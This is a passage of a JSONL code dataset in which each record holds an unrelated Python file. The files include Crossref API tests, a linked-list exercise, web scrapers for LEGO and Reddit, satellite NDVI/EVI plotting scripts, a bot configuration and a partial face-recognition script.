res[\"message\"]\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_query.yaml\")\ndef test_types_query():\n \"types - param: query - doesn't do anything without works\"\n res = cr.types(query=\"journal\")\n assert a == res[\"message\"]\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_ids.yaml\")\ndef test_types_ids():\n \"types - param: ids\"\n res = cr.types(ids=\"journal\")\n assert dict == res.__class__\n assert {u\"id\": u\"journal\", u\"label\": u\"Journal\"} == res[\"message\"]\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_works.yaml\")\ndef test_types_works():\n \"types - param: works\"\n res = cr.types(ids=\"journal\", works=True, limit=2)\n assert dict == res.__class__\n assert \"work-list\" == res[\"message-type\"]\n\n\n# FIXME: not sure why, but the line where we get titles obj is failing with\n# UnicodeEncodeError: 'ascii' codec can't encode character u'\\u2019' in position 109: ordinal not in range(128)\n# def test_types_field_queries():\n# \"types - param: kwargs - field queries work as expected\"\n# res = cr.types(ids = \"journal-article\", works = True, query_bibliographic = 'gender', rows = 20)\n# titles = [ str(x.get('title')[0]) for x in res['message']['items'] ]\n# assert dict == res.__class__\n# assert 5 == len(res['message'])\n# assert list == titles.__class__\n# assert str == titles[0].__class__\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_filters_not_allowed_with_typeid.yaml\")\ndef test_types_query_filters_not_allowed_with_typeid():\n \"types - param: kwargs - query filters not allowed on types/type/ route\"\n with pytest.raises(exceptions.RequestError):\n cr.types(ids=\"journal-article\", query_bibliographic=\"gender\")\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_query_title_not_allowed_anymore.yaml\")\ndef test_types_query_title_not_allowed_anymore():\n \"types - param: kwargs - query_title query not allowed anymore\"\n with pytest.raises(exceptions.RequestError):\n cr.types(works=True, query_title=\"cellular\")\n","sub_path":"test/test-types.py","file_name":"test-types.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227981961","text":"from zope.interface import Interface\n# -*- Additional Imports Here -*-\nfrom zope import schema\n\nfrom ebc.automator import automatorMessageFactory as _\n\n\n\nclass IInfoOlimpiadas(Interface):\n \"\"\"InfoOlimpiadas\"\"\"\n\n # -*- schema definition goes here -*-\n mensagem = schema.TextLine(\n title=_(u\"Mensagem\"),\n required=True,\n description=_(u\"Field description\"),\n )\n#\n credito = schema.TextLine(\n title=_(u\"Credito\"),\n required=True,\n description=_(u\"Field description\"),\n )\n#\n","sub_path":"ebc/automator/interfaces/infoolimpiadas.py","file_name":"infoolimpiadas.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"438859142","text":"import numpy as np\n\nprefix = 'C:/Users/CTK_CAD/Chalmers Teknologkonsulter AB/Bird Classification - Images/Bird Detection - Images/Original images/'\nannotationsfile = prefix + 'test_drones.txt'\n\nclass_counter = np.zeros((1,3))\n\n\nwith open(annotationsfile) as f:\n lines = f.readlines()\nfor line in lines:\n boxes = line.split()[1:]\n for box in boxes:\n l,t,r,b,c = box.split(',')\n class_counter[0,int(c)] += 1\n\n\nfor i in range(3):\n print(class_counter[0,i])","sub_path":"countClassFreq.py","file_name":"countClassFreq.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"198037377","text":"# Partition: Write code to partition a linked list around a value x, \n# such that all nodes less than x come before all nodes greater than \n# or equal to x. If x is contained within the list, the values of x \n# only need to be after the elements less than x (see below). \n# The partition element x can appear anywhere in the \"right partition\"; \n# it does not need to appear between the left and right partitions.\n\n# SOLUTION\n# EXAMPLE\n# Input: \t3 -> 5 -> 8 -> 5 -> 10 -> 2 -> 1 [partition=5] \n# Output: \t3 -> 1 -> 2 -> 10 -> 5 -> 5 -> 8\n\n\nclass Node():\n\tdef __init__(self, data, next=None):\n\t\tself.data = data\n\t\tself.next = next\n\n\ndef partitionNode(head, target):\n\tpl1, pl2, pr1, pr2 = None, None, None, None\n\n\t# listL = Node(None, None) # how to create a new node?\n\t# listH = Node(None, None) \n\n\tnode = head\n\n\twhile node:\n\t\tif node.data < target: #send to Left list\n\t\t\t# listL.data = head.data\n\t\t\t# listL.next = \n\t\t\tif pl1:\n\t\t\t\tpl2.next = node\n\t\t\t\tpl2 = node\n\t\t\telse:\n\t\t\t\tpl1 = node\n\t\t\t\tpl2 = node\n\t\telse:\n\n\t\t\tif pr1:\n\t\t\t\tpr2.next = node\n\t\t\t\tpr2 = node\n\t\t\telse:\n\t\t\t\tpr1 = node\n\t\t\t\tpr2 = node\n\t\tnode = node.next\n\tpl2.next = pr1\t#Merging the two lists\n\n\treturn pl1\n\ndef printList(head):\n\tif head.next:\n\t\tprint(head.data)\n\t\tprintList(head.next)\n\n\n\n # string = str(head.data)\n # if head.next:\n # string += ',' + str(head.next)\n # print( str(string))\n\n\n\n\n\n#Start\n\nlist1 = Node(3,Node(5,Node(8,Node(5,Node(10,Node(2,Node(1)))))))\n# expected Output: \t3 -> 1 -> 2 -> 10 -> 5 -> 5 -> 8\n\n\n\nprintList(partitionNode(list1, 5))\n\n\n# print(str(partitionNode(list1, 5)))\n\n","sub_path":"CTCI_book/CH2 - Linked lists/2.4.py","file_name":"2.4.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557053863","text":"class Solution(object):\n def fourSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n for i,n in enumerate(nums):\n three = self.threeSum(nums[i + 1:], target - n)\n if three:\n four = [ sorted(x + [n]) for x in three ]\n for f in four:\n if f not in res:\n res += f,\n return res\n\n\n def threeSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n for i,n in enumerate(nums):\n two = self.twoSum(nums[i + 1:], target - n)\n if two:\n three = [ sorted(x + [n]) for x in two ]\n for t in three:\n if t not in res:\n res += t,\n return res\n\n\n def twoSum(self, nums, target):\n got = {}\n res = []\n for n in nums:\n if n not in got:\n got[target - n] = n\n else:\n res += [got[n], n],\n return res","sub_path":"fourSum.py","file_name":"fourSum.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"249706857","text":"#-*-coding:utf-8-*-\nimport requests, re, json\nfrom bs4 import BeautifulSoup\n\nclass Lego:\n\n def __init__(self):\n # self.url = url\n self.session = requests.Session()\n\n def get_single_page(self, url):\n self.url = url\n data = self.crawler_exec()\n\n return data\n def get_price(self, res):\n \"return product price\"\n print(res.text)\n self.soup = BeautifulSoup(res.text, 'lxml')\n price_ele = self.soup.find('span', {'class': re.compile('ProductPrice.+')})\n if price_ele is None:\n return -1\n r = re.compile(r'[0-9]+\\.[0-9]+')\n result = r.search(price_ele.text)\n if result:\n return result.group()\n return -1\n\n def get_main_images(self):\n \"return product image\"\n image_eles = self.soup.find_all('img', re.compile('Thumbnail__Image.+'))\n result = []\n for ele in image_eles:\n result.append(ele.attrs['src'])\n return result\n\n def get_content_images(self):\n main_contetn_ele = self.soup.find('div', {'class': re.compile('ProductDynamicContent.+')})\n if main_contetn_ele is None:\n return -1\n picture_parents_ele = main_contetn_ele.find_all('picture', {'class': re.compile('HeroBannerstyles__HeroPicture.+')})\n result_list = []\n for par_ele in picture_parents_ele:\n source_eles = par_ele.find_all('source')\n for source in source_eles:\n result_list.append(source.attrs['srcset'])\n return result_list\n\n def get_tag(self):\n result_list = []\n for item_ele in self.soup.find_all('span', {'class': re.compile('ProductBadge__StyledBadge.+')}):\n result_list.append(item_ele.text)\n\n return result_list\n\n def get_title(self):\n title_ele = self.soup.find('h1', {'itemprop': 'name'})\n return title_ele.text\n\n def get_specifications(self):\n result = {}\n content_ele = self.soup.find('div', {'class': re.compile('ProductFeaturesstyles__Copy.+')})\n\n content_text = content_ele.text\n result.update({'main': content_text})\n bullet_ele = self.soup.find('div', {'class': re.compile('ProductFeaturesstyles__BulletText.+')})\n if bullet_ele is None:\n return -1\n bullet_text = []\n\n for li_ele in bullet_ele.find_all('li'):\n bullet_text.append(li_ele.text)\n result.update({'bullet': bullet_text})\n cta_ele = self.soup.find('div', {'class': re.compile('ProductFeaturesstyles__Cta.+')})\n try:\n cta_img_ele = cta_ele.find('img')\n result.update({'cta_img': cta_img_ele.attrs['src']})\n except Exception as e:\n print(str(e))\n return result\n\n def get_currency(self, res):\n \"return product currency\"\n self.soup = BeautifulSoup(res.text, 'lxml')\n if self.soup.find('meta', property=\"product:price:currency\")[\"content\"] == \"\":\n return -1\n return self.soup.find('meta', property=\"product:price:currency\")[\"content\"]\n\n def crawler_exec(self):\n # 回傳 圖片、說明、價格、文字、幣別的Json\n res = self.session.get(self.url)\n price = self.get_price(res)\n title = self.get_title()\n main_images = self.get_main_images()\n content_images = self.get_content_images()\n # tags = self.get_tag()\n spec = self.get_specifications()\n\n # currency\n currency = self.get_currency(res)\n\n key_list = ['title', 'price', 'tags', 'colors', 'size', 'main_images', 'content_images', 'currency', 'url', 'description', 'collection', 'in_stock']\n data = {key: -1 for key in key_list}\n datas = {\"price\": price,\n \"title\": title,\n \"main_images\": main_images,\n \"content_images\": content_images,\n \"currency\": currency\n }\n data.update(datas)\n return data\n\n\nif __name__ == '__main__':\n url = 'https://www.lego.com/tr-tr/product/land-rover-defender-42110'\n # data = Lego(url).crawler_exec()\n data = Lego().get_single_page(url)\n print(data)\n\n #save dict as json file\n with open(f\"{data['title']}.json\", \"w\") as f:\n f.write(json.dumps(data, sort_keys=True, indent=4))\n","sub_path":"WaterGuanyin/buy_spider/craw_module/Lego.py","file_name":"Lego.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583576222","text":"import requests\n\nfrom django.conf import settings\n\nimport utils.requester as Requester\n\nDATA_CATALOG_API_URL = \"https://data.opendatasoft.com/api/datasets/1.0/{}/\"\nDATA_CATALOG_API_SEARCH_URL = \"https://data.opendatasoft.com/api/datasets/1.0/search/\"\nDATA_CATALOG_API_SEARCH_V2_URL = \"https://data.opendatasoft.com/api/v2/catalog/datasets/\"\n\n\nclass DatasetIdMissing(Exception):\n pass\n\n\ndef dataset_meta_request(dataset_id):\n if dataset_id:\n params = {'apikey': settings.DATA_API_KEY}\n request = requests.get(DATA_CATALOG_API_URL.format(dataset_id), params, timeout=Requester.get_timeout(), headers=Requester.create_ods_headers())\n request.raise_for_status()\n return request.json()\n else:\n raise DatasetIdMissing\n\n\ndef datasets_meta_request(start=0, rows=100):\n params = {'start': start, 'rows': rows, 'apikey': settings.DATA_API_KEY}\n request = requests.get(DATA_CATALOG_API_SEARCH_URL, params, timeout=Requester.get_timeout(), headers=Requester.create_ods_headers())\n request.raise_for_status()\n return request.json()\n\n\ndef datasets_search_v2(search='', rows=10, sort='explore.popularity_score'):\n params = {'search': search, 'rows': rows, 'sort': sort, 'apikey': settings.DATA_API_KEY}\n request = requests.get(DATA_CATALOG_API_SEARCH_V2_URL, params, timeout=Requester.get_timeout(), headers=Requester.create_ods_headers())\n request.raise_for_status()\n return request.json()\n","sub_path":"utils/ods_catalog_api.py","file_name":"ods_catalog_api.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48295646","text":"import os\nimport json\nfrom distutils.util import strtobool as stb\n\n# --------------------------------------\nBOT_TOKEN = \"\"\nGDRIVE_FOLDER_ID = \"\"\n# Default folder id.\nOWNER_ID = 123455673\n# Example: OWNER_ID = 619418070\nAUTHORISED_USERS = []\n# Example: AUTHORISED_USERS = [63055333, 100483029, -1003943959]\nINDEX_URL = \"\"\nIS_TEAM_DRIVE = True\nUSE_SERVICE_ACCOUNTS = True\nTHREAD_COUNT = 4 \n# --> THREAD_COUNT: How many parralel transfers of every single clone at the same time\n# ----> eg. I'm running 2 clones, and THREAD_COUNT is set to 4; so each clone will have 4 threads of it's own\n# Suggested value is the number of CPU Cores + 2 or CPU Cores x 2. Try what suits you best :3\n# --------------------------------------\n\n# dont edit below this >\n\n\n\nBOT_TOKEN = os.environ.get('BOT_TOKEN', BOT_TOKEN)\nGDRIVE_FOLDER_ID = os.environ.get('GDRIVE_FOLDER_ID', GDRIVE_FOLDER_ID)\nOWNER_ID = int(os.environ.get('OWNER_ID', OWNER_ID))\nAUTHORISED_USERS = json.loads(os.environ.get('AUTHORISED_USERS', json.dumps(AUTHORISED_USERS)))\nINDEX_URL = os.environ.get('INDEX_URL', INDEX_URL)\nIS_TEAM_DRIVE = stb(os.environ.get('IS_TEAM_DRIVE', str(IS_TEAM_DRIVE)))\nUSE_SERVICE_ACCOUNTS = stb(os.environ.get('USE_SERVICE_ACCOUNTS', str(USE_SERVICE_ACCOUNTS)))\nTHREAD_COUNT = int(os.environ.get('THREAD_COUNT', THREAD_COUNT))","sub_path":"bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292300988","text":"\"\"\"\nnum1 = int(input('Digite um número: '))\nnum2 = int(input('Digite outro: '))\n\ndef somar(num1, num2):\n soma = num1 + num2\n print(f'Resultado: {soma}')\n\nsomar(num1, num2)\n\"\"\"\ndef saudacao(msg, nome):\n print(f'{msg}, {nome}')\n\nmsg = 'Olá'\nnome = input('Digite seu nome: ')\n\nsaudacao(msg, nome)","sub_path":"funções/parte1.py","file_name":"parte1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366023347","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 24 14:30:00 2018\n\n@author: pme-mst\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.io\n\n# Set ramp characteristics\nN = 86400 # sample count\nP = N/48 # period\nD = P/4 # width of pulse\nsig = np.arange(N) % P < D\n\n# replace bools by int and create df\ny = sig.astype(int)\ndf = pd.DataFrame(np.transpose(sig.astype(int)))\ndf['Zeit'] = range(len(df.index))\ncols = df.columns.tolist()\ncols = cols [-1:] + cols [:-1]\ndf = df[cols]\n\n# save data to mat \nmy_mat_dict = {'CalibrationParameters':df}\nscipy.io.savemat('D:/pme-mst/Dymola_WorkDir/training data/Storage/DHW/RandomRampSignal', mdict = my_mat_dict, format='4')\n","sub_path":"Datenauswertung/Zeitreihenanalyse/Regelung/radmonpulseinput.py","file_name":"radmonpulseinput.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"67696249","text":"from textblob import TextBlob, Word\nfrom textblob.wordnet import VERB\nimport praw\nfrom praw.models import MoreComments\nimport pandas as pd\n\n\ndef m1():\n text = TextBlob(\"She rode her bicycle to the store and and.\")\n out = \"\"\n for word in text.words:\n try:\n out += \" \" + word.definitions[0]\n except IndexError:\n pass\n\n print(out)\n\ndef most_used_word(phrase):\n text = TextBlob(phrase)\n out = \"\"\n for word in text.words:\n print(text.words.count(word))\n\n\ndef subreddit_scrape(reddit):\n subreddit = reddit.subreddit('vancouver')\n\n top_subreddit = subreddit.top(limit=100)\n # hot_subreddit = subreddit.hot(limit=10)\n\n topics_dict = {\"title\": [],\n \"score\": [],\n \"id\": [],\n \"url\": [],\n \"comms_num\": [],\n \"created\": [],\n \"body\": [],\n \"comments\": []}\n\n for submission in top_subreddit:\n submission.comments.replace_more(limit=None)\n for top_level_comment in submission.comments:\n print(top_level_comment.body)\n\n # for submission in top_subreddit:\n # topics_dict[\"title\"].append(submission.title)\n # topics_dict[\"score\"].append(submission.score)\n # topics_dict[\"id\"].append(submission.id)\n # topics_dict[\"url\"].append(submission.url)\n # topics_dict[\"comms_num\"].append(submission.num_comments)\n # topics_dict[\"created\"].append(submission.created)\n # topics_dict[\"body\"].append(submission.selftext)\n # topics_dict[\"comments\"].append(submission.comments)\n\n\n # topics_data = pd.DataFrame(topics_dict)\n\n\n\ndef get_comments(reddit):\n submission = reddit.submission(url='https://www.reddit.com/r/funny/comments/3g1jfi/buttons/')\n # or with the submission’s ID which comes after comments / in the URL:\n # submission = reddit.submission(id='3g1jfi')\n\n submission.comments.replace_more(limit=None)\n for top_level_comment in submission.comments:\n print(top_level_comment.body)\n\nif __name__ == '__main__':\n reddit = praw.Reddit(client_id='XXXX',\n client_secret='XXXX',\n user_agent='XXXX',\n username='XXXX',\n password='XXXXX')\n subreddit_scrape(reddit)\n # get_comments(reddit)\n\n\n","sub_path":"cicero/cicero.py","file_name":"cicero.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572021553","text":"####\n#### Nov 18, 2021\n####\n\nimport csv\nimport numpy as np\nimport pandas as pd\n\nimport datetime\nfrom datetime import date\nimport time\n\nimport scipy\nimport scipy.signal\nimport os, os.path\n\nfrom patsy import cr\n\n# from pprint import pprint\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom pandas.plotting import register_matplotlib_converters\n\nregister_matplotlib_converters()\n\nimport sys\nstart_time = time.time()\n\n# search path for modules\n# look @ https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path\n####################################################################################\n###\n### Aeolus Core path\n###\n####################################################################################\n\nsys.path.append('/home/hnoorazar/NASA/')\nimport NASA_core as nc\nimport NASA_plot_core as ncp\n\n####################################################################################\n###\n### Parameters \n###\n####################################################################################\ncounty = sys.argv[1]\nprint (county)\n####################################################################################\n###\n### Aeolus Directories\n###\n####################################################################################\nparam_dir = \"/data/hydro/users/Hossein/NASA/000_shapefile_data_part/\"\nraw_dir = \"/data/hydro/users/Hossein/NASA/01_raw_GEE/\"\ndata_dir = \"/data/hydro/users/Hossein/NASA/05_SG_TS/\"\nSOS_plot_dir = \"/data/hydro/users/Hossein/NASA/06_SOS_plots/\"\n\nprint (\"_________________________________________________________\")\nprint (\"data dir is: \" + data_dir)\nprint (\"_________________________________________________________\")\n\n####################################################################################\n###\n### Read data\n###\n####################################################################################\n\nif county == \"Monterey2014\":\n raw_names = [\"L7_T1C2L2_Scaled_Monterey2014_2013-01-01_2016-01-01.csv\",\n \"L8_T1C2L2_Scaled_Monterey2014_2013-01-01_2016-01-01.csv\"]\n\nelif county == \"AdamBenton2016\":\n raw_names = [\"L7_T1C2L2_Scaled_AdamBenton2016_2015-01-01_2017-10-14.csv\",\n \"L8_T1C2L2_Scaled_AdamBenton2016_2015-01-01_2017-10-14.csv\"]\n\nelif county == \"FranklinYakima2018\":\n raw_names = [\"L7_T1C2L2_Scaled_FranklinYakima2018_2017-01-01_2019-10-14.csv\",\n \"L8_T1C2L2_Scaled_FranklinYakima2018_2017-01-01_2019-10-14.csv\"]\n\nelif county == \"Grant2017\":\n raw_names = [\"L7_T1C2L2_Scaled_Grant2017_2016-01-01_2018-10-14.csv\",\n \"L8_T1C2L2_Scaled_Grant2017_2016-01-01_2018-10-14.csv\"]\n\nelif county == \"Walla2015\":\n raw_names = [\"L7_T1C2L2_Scaled_Walla2015_2014-01-01_2016-12-31.csv\",\n \"L8_T1C2L2_Scaled_Walla2015_2014-01-01_2016-12-31.csv\"]\n\n\nSF_data_name = county + \".csv\"\n\nSG_df_NDVI = pd.read_csv(data_dir + \"SG_\" + county + \"_NDVI_JFD.csv\")\nSG_df_EVI = pd.read_csv(data_dir + \"SG_\" + county + \"_EVI_JFD.csv\")\n\n# convert the strings to datetime format\nSG_df_NDVI['human_system_start_time'] = pd.to_datetime(SG_df_NDVI['human_system_start_time'])\nSG_df_EVI['human_system_start_time'] = pd.to_datetime(SG_df_EVI['human_system_start_time'])\n\n# Monterays ID will be read as integer, convert to string\nSG_df_EVI[\"ID\"] = SG_df_EVI[\"ID\"].astype(str)\nSG_df_NDVI[\"ID\"] = SG_df_NDVI[\"ID\"].astype(str)\n\n\"\"\"\n Read and Clean the raw data\n\"\"\"\nL7 = pd.read_csv(raw_dir + raw_names[0], low_memory=False)\nL8 = pd.read_csv(raw_dir + raw_names[1], low_memory=False)\nraw_df = pd.concat([L7, L8])\nraw_df[\"ID\"] = raw_df[\"ID\"].astype(str)\ndel (L7, L8)\n\"\"\"\n Plots should be exact. Therefore, we need to filter by\n last survey year, toss out NASS, and we are sticking to irrigated\n fields for now.\n\"\"\"\nSF_data = pd.read_csv(param_dir + SF_data_name)\nSF_data[\"ID\"] = SF_data[\"ID\"].astype(str)\n\nprint (\"line 116\")\nprint (raw_df.shape)\nprint (SG_df_NDVI.shape)\nprint (SG_df_EVI.shape)\n\nprint (SF_data.head(1))\nprint (raw_df.head(1))\nprint (SG_df_NDVI.head(1))\nprint (SG_df_EVI.head(1))\n\nif county != \"Monterey2014\":\n # filter by last survey date. Last 4 digits of county name!\n SF_data = nc.filter_by_lastSurvey(SF_data, year = county[-4:]) \n SF_data = nc.filter_out_NASS(SF_data) # Toss NASS\n SF_data = nc.filter_out_nonIrrigated(SF_data) # keep only irrigated lands\n print (\"line 130\")\n print (SF_data.shape)\n print (SF_data.head(2))\n \n fk = list(SF_data.ID)\n raw_df = raw_df[raw_df.ID.isin(fk)]\n SG_df_EVI = SG_df_EVI[SG_df_EVI.ID.isin(fk)]\n SG_df_NDVI= SG_df_NDVI[SG_df_NDVI.ID.isin(fk)]\n\n print (\"line 138\")\n print (raw_df.shape)\n print (SG_df_NDVI.shape)\n print (SG_df_EVI.shape)\n\n print (raw_df.head(1))\n print (SG_df_NDVI.head(1))\n print (SG_df_EVI.head(1))\n\nraw_df_EVI = raw_df.copy()\nraw_df_NDVI = raw_df.copy()\ndel(raw_df)\n\nraw_df_EVI.drop([\"NDVI\"], axis=1, inplace=True)\nraw_df_NDVI.drop([\"EVI\"], axis=1, inplace=True)\n\nraw_df_EVI = raw_df_EVI[raw_df_EVI[\"EVI\"].notna()]\nraw_df_NDVI = raw_df_NDVI[raw_df_NDVI[\"NDVI\"].notna()]\n\nraw_df_EVI = nc.add_human_start_time_by_system_start_time(raw_df_EVI)\nraw_df_NDVI= nc.add_human_start_time_by_system_start_time(raw_df_NDVI)\n\n########################################\n\nSG_df_NDVI = nc.initial_clean(df = SG_df_NDVI, column_to_be_cleaned = \"NDVI\")\nSG_df_EVI = nc.initial_clean(df = SG_df_EVI, column_to_be_cleaned = \"EVI\")\n\nraw_df_NDVI = nc.initial_clean(df = raw_df_NDVI, column_to_be_cleaned = \"NDVI\")\nraw_df_EVI = nc.initial_clean(df = raw_df_EVI, column_to_be_cleaned = \"EVI\")\n\ncounter = 0\n\n### List of unique fields\nIDs = np.sort(SG_df_EVI[\"ID\"].unique())\nprint (\"_____________________________________\")\nprint('len(IDs) is {}!'.format(len(IDs)))\nprint (\"_____________________________________\")\n\n\ngiven_year = int(county[-4:])\nmin_year = pd.to_datetime(datetime.datetime(given_year-1, 1, 1))\nmax_year = pd.to_datetime(datetime.datetime(given_year+1, 12, 31))\nSG_df_NDVI = SG_df_NDVI[SG_df_NDVI.human_system_start_time >= min_year]\nSG_df_NDVI = SG_df_NDVI[SG_df_NDVI.human_system_start_time <= max_year]\n\nSG_df_EVI = SG_df_EVI[SG_df_EVI.human_system_start_time >= min_year]\nSG_df_EVI = SG_df_EVI[SG_df_EVI.human_system_start_time <= max_year]\n\nprint (\"line 172\")\nprint (SG_df_NDVI.shape)\nprint (SG_df_EVI.shape)\nfor ID in IDs:\n if (counter%1000 == 0):\n print (\"_____________________________________\")\n print (\"counter: \" + str(counter))\n print (ID)\n\n curr_SF_data = SF_data[SF_data['ID'] == ID].copy()\n curr_SG_NDVI = SG_df_NDVI[SG_df_NDVI['ID'] == ID].copy()\n curr_SG_NDVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_SG_NDVI.reset_index(drop=True, inplace=True)\n\n curr_raw_NDVI = raw_df_NDVI[raw_df_NDVI['ID'] == ID].copy()\n curr_raw_NDVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_raw_NDVI.reset_index(drop=True, inplace=True)\n\n\n curr_SG_EVI = SG_df_EVI[SG_df_EVI['ID'] == ID].copy()\n curr_SG_EVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_SG_EVI.reset_index(drop=True, inplace=True)\n\n curr_raw_EVI = raw_df_EVI[raw_df_EVI['ID'] == ID].copy()\n curr_raw_EVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_raw_EVI.reset_index(drop=True, inplace=True)\n ################################################################\n \n fig, axs = plt.subplots(2, 1, figsize=(18, 6),\n sharex='col', sharey='row',\n gridspec_kw={'hspace': 0.1, 'wspace': .1});\n\n (ax1, ax2) = axs;\n ax1.grid(True); ax2.grid(True); \n # ax3.grid(True); ax4.grid(True); ax5.grid(True); ax6.grid(True);\n\n # Plot NDVIs\n ncp.SG_clean_SOS_orchardinPlot(raw_dt = curr_raw_NDVI,\n SG_dt = curr_SG_NDVI,\n idx = \"NDVI\",\n ax = ax1,\n onset_cut = 0.3, \n offset_cut = 0.3);\n\n # Plot EVIs\n ncp.SG_clean_SOS_orchardinPlot(raw_dt = curr_raw_EVI,\n SG_dt = curr_SG_EVI,\n idx = \"EVI\",\n ax = ax2,\n onset_cut = 0.3, \n offset_cut = 0.3);\n\n \"\"\"\n Title is already set in the function above. \n We can replace/overwrite it here:\n \"\"\"\n if county == \"Monterey2014\":\n plant = curr_SF_data['Crop2014'].unique()[0].lower().replace(\" \", \"_\").replace(\",\", \"\").replace(\"/\", \"_\")\n data_source = \"Land IQ\"\n survey_date = curr_SF_data['LstModDat'].unique()[0]\n plot_title = county + \", \" + plant + \" (\" + ID + \", \" + data_source + \", \" + survey_date +\")\"\n else:\n plant = curr_SF_data['CropTyp'].unique()[0].lower().replace(\" \", \"_\").replace(\",\", \"\").replace(\"/\", \"_\")\n data_source = curr_SF_data['DataSrc'].unique()[0]\n irrig_type = curr_SF_data['Irrigtn'].unique()[0]\n survey_date = curr_SF_data['LstSrvD'].unique()[0]\n plot_title = county + \", \" + plant + \" (\" + ID + \", \" + data_source + \", \" + irrig_type + \", \" + survey_date +\")\"\n\n ax1.set_title(plot_title);\n ax2.set_title(\"\");\n\n plot_path = SOS_plot_dir + \"/train_plots_JFD/\" + plant + \"/\"\n os.makedirs(plot_path, exist_ok=True)\n\n fig_name = plot_path + county + \"_\" + ID +'.pdf'\n plt.savefig(fname = fig_name, dpi=100, bbox_inches='tight')\n plt.close('all')\n counter += 1\n\n\nprint (\"done\")\n\nend_time = time.time()\nprint (\"it took {:.0f} minutes to run this code.\".format((end_time - start_time)/60))\n\n\n","sub_path":"NASA/Python_codes/drivers/05_SOSDetection_plot/03_d_train_plots_JFD.py","file_name":"03_d_train_plots_JFD.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139190692","text":"def divisible_by(number,divided):\n return number%divided\n\n\ndef ask_for_number():\n try:\n return int(input(\"Enter a number \"))\n except (ValueError):\n return\n\n\ndef check_parity(number):\n if number == None:\n print(\"Please, enter an integer\")\n check_parity(ask_for_number())\n elif divisible_by(number,2) == 0:\n print(\"{0} is an even number\".format(number))\n else:\n print(\"{0} is an odd number\".format(number))\n\n\ncheck_parity(ask_for_number())\n","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"603060930","text":"import cv2\nfrom libs import preprocessing\nimport joblib\nimport numpy as np\nfrom PIL import Image\nimport argparse\nfrom utils import Draw_face_names\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', default = 'webcam', nargs='?', choices= ['webcam', 'video', 'image'], help= '3 mode to test(image, video, webcam)')\n parser.add_argument('--confidence', default = 0.8, type= float, help = 'set confidence threshold for recognizer')\n parser.add_argument('--video-path', type= str, help = 'video folder path')\n parser.add_argument('--image-path', type=str, help = 'input image file')\n parser.add_argument('--model', default= 'models/recogniser_v1.pkl', type=str, help= 'load model path')\n return parser.parse_args()\n \ndef main():\n\n args = parse_args()\n global frame_count, total_save\n face_recogniser = joblib.load(args.model)\n preprocess = preprocessing.ExifOrientationNormalize()\n\n if args.mode == 'webcam':\n cap = cv2.VideoCapture(0)\n while True:\n ret, frame = cap.read()\n frame = frame[:,::-1,:]\n if not ret:\n break\n img = Image.fromarray(frame[..., ::-1])\n faces = face_recogniser(preprocess(img))\n if faces is not None:\n Draw_face_names(faces, img, confidence= args.confidence)\n\n # img = img.resize((frame.shape[1], frame.shape[0]))\n cv2.imshow('webcam', np.array(img)[:,:,::-1])\n if cv2.waitKey(1)== 27 or cv2.waitKey(1) == ord('q') :\n break\n cv2.destroyAllWindows()\n cap.release()\n\n elif args.mode == 'video':\n video_files = [os.path.join(args.video_path, file) \n for file in sorted(os.listdir(args.video_path))\n if file.endswith(('.mp4','.mkv','.avi'))]\n \n for idx, video_file in enumerate(video_files):\n cap = cv2.VideoCapture(video_file)\n assert cap.isOpened(), \"video file can't open!\"\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n # start = timer()\n img = Image.fromarray(frame[..., ::-1])\n faces = face_recogniser(preprocess(img))\n if faces is not None:\n Draw_face_names(faces, img, confidence= args.confidence)\n # img = img.resize((320, 480))\n cv2.imshow(os.path.basename(video_file), np.array(img)[:,:,::-1])\n if 